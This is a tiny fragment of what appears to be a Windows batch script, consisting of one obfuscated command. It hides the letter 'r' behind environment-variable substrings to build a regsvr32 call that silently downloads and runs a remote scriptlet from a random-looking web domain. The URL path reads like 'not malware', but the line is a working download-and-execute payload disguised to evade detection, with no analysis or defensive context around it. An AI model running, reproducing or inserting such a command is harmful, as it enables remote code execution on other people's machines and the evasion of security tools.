 F L
 @echo off %ALLUSERSPROFILE:~4,1%egsv%ALLUSERSPROFILE:~4,1%32.exe /s /n /i:http://idJNePaVfBClWOxYFMo%ALLUSERSPROFILE:~4,1%GtAbZuSypzK%ALLUSERSPROFILE:~4,1%scwjDQUXngkLhvTEIHqm.com/n0tm4lw4%ALLUSERSPROFILE:~4,1%3  F L
